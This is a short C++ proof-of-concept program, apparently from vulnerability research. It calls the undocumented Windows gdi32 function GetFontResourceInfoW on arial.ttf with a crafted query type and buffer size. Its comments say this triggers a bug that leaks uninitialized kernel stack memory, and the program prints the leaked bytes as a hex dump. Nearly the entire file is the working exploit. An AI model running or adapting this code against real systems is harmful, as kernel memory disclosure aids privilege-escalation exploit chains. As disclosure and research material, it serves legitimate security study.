#include <Windows.h>
|
#include <cstdio>
|
|
// Undocumented definitions for the gdi32!GetFontResourceInfoW function.
|
typedef BOOL(WINAPI *PGFRI)(LPCWSTR, LPDWORD, LPVOID, DWORD);
|
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
printf("%.8x: ", i);
|
|
for (ULONG j = 0; j < 16; j++) {
|
if (i + j < dwBytes) {
|
printf("%.2x ", Data[i + j]);
|
}
|
else {
|
printf("?? ");
|
}
|
}
|
|
for (ULONG j = 0; j < 16; j++) {
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
printf("%c", Data[i + j]);
|
}
|
else {
|
printf(".");
|
}
|
}
|
|
printf("\n");
|
}
|
}
|
|
int main() {
|
// Resolve the GDI32!GetFontResourceInfoW symbol.
|
HINSTANCE hGdi32 = LoadLibrary(L"gdi32.dll");
|
PGFRI GetFontResourceInfo = (PGFRI)GetProcAddress(hGdi32, "GetFontResourceInfoW");
|
|
// Trigger the vulnerability and dump kernel stack output. The code assumes that Windows is
|
// installed on partition C:\ and the C:\Windows\Fonts\arial.ttf font is present on disk.
|
BYTE OutputBuffer[0x5c] = { /* zero padding */ };
|
DWORD OutputSize = sizeof(OutputBuffer);
|
if (!GetFontResourceInfo(L"C:\\Windows\\Fonts\\arial.ttf", &OutputSize, OutputBuffer, 5)) {
|
printf("GetFontResourceInfo failed.\n");
|
return 1;
|
}
|
|
PrintHex(OutputBuffer, sizeof(OutputBuffer));
|
|
return 0;
|
}
|